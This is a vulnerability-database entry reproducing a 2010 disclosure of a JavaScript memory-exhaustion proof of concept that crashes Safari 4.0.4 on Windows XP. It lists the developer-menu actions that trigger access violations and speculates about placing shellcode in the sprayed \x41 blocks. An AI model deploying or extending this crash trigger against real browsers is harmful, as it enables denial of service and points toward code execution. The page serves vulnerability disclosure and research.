Vulners
Lucene search
The following piece of javascript will crash Safari nicely when triggered using one \
of the methods described below. With my limited knowledge I am unable to tell if \
it's exploitable or not. I therefore turn it over to "the internet". (tested on \
Safari 4.0.4, Win XP Pro SP3)
============================
<script>
var data = "A";
while(data.length<0x40000){
data += data;
}
data2 = new Array();
for (x=0; x<4000; x++){
data2[x] = data+data;
}
</script>
============================
The crash is not immediate, but there are actually two ways to trigger it and I \
believe they are separate problems.
The following will cause Safari to crash with “Access violation reading [00000000]”.
* Window->Activity
Whereas these will crash Safari with “Access violation writing to [BBADBEEF]”
* Develop->Start Debugging Javascript
* Develop->Show Error Console (Unreliable)
* Develop->Show Web Inspector (Unreliable)
* (Right Click)->Inspect Element
I can’t seem to affect any registers in an advantageous way but I do see several \
pointers to \x41 blocks on the stack. At least you could put shellcode in these and \
jump to them if you could control EIP. If anyone is able to do anything with this, \
please let me know.
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Jan 2010 00:00Current
7.1High risk
Vulners AI Score7.1